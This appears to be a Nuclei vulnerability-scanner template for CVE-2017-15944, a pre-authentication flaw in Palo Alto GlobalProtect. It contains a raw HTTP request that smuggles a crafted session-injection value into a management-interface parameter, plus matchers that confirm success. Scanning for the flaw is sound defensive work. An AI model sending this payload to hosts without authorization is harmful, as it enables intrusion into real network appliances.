nuclei-templates/cves/2017/CVE-2017-15944.yaml

29 lines
909 B
YAML

id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012
description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
reference:
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
requests:
- raw:
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
words:
- "@start@Success@end@"
part: body
- type: status
status:
- 200